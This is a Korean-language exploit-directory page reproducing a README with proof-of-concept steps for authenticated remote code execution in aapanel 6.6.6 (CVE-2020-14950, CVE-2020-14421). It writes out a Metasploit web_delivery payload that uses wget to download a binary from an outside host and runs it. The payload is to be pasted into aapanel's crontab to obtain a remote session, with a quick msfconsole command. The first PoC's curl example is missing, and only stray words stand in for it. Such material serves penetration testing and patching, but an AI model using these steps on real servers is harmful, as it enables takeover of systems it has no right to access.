Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
aapanel — aapanel 6.6.6 - (인증된) 원격 코드 실행 | Kitploit
도구/GitHubGitHub/jenaye/aapanel
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubjenaye/aapanel

aapanel

aapanel 6.6.6 - (인증된) 원격 코드 실행

저장소 보기
276년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

aapanel

aapanel 6.6.6 - CVE-2020-14950

  • 설명: 원격 인증 사용자가 Sotfware Store의 설정 메뉴를 통해 임의의 명령을 실행할 수 있습니다.
  • 영향받는 버전: All <= 6.6.6

정보

이 PoC를 만들기 위해 docker-compose로 소프트웨어를 설치했습니다.

  • 취약점 유형: 원격 명령 실행 (인증된 RCE)

POC

Software Store로 이동하여 설정 필드의 아무 행이나 클릭한 다음, "start/stop/restart"를 클릭할 때 요청을 가로채서 원하는 명령을 실행하도록 요청을 수정/편집하세요. 다음은 curl을 사용한 예시입니다:

receStore receStore

aapanel 6.6.6 - CVE-2020-14421

  • 설명: 공격자가 원격에서 임의의 명령을 실행할 수 있습니다.
  • 영향받는 버전: All <= 6.6.6

정보

이 PoC를 만들기 위해 Ubuntu 20.04를 새로 설치한 후, wget + sudo를 설치하고 다음 스크립트를 실행했습니다. wget -O install.sh http://www.aapanel.com/script/install-ubuntu_6.0_en.sh && sudo bash install.sh

  • 취약점 유형: 원격 명령 실행 (인증된 RCE)

POC

먼저 web_delivery 옵션을 설정하세요. 그러면 페이로드와 리스너가 생성됩니다.

web_delivery

이제 실행하세요.

실행

그러면 다음 페이로드가 생성됩니다:

wget -qO wt8v00sC --no-check-certificate http://xxxx:8088/gUVn1orp; chmod +x wt8v00sC; ./wt8v00sC& disown

그런 다음 aapanel의 crontab 메뉴에 있는 script content에 다음과 같이 복사/붙여넣기 하세요.

cron

이제 crontab을 실행하고 세션을 기다리세요.

명령

빠른 익스플로잇

msfconsole -r aapanel.rc를 실행하고, 페이로드를 script content 섹션에 복사/붙여넣기한 다음 세션을 즐기세요.

도구 다운로드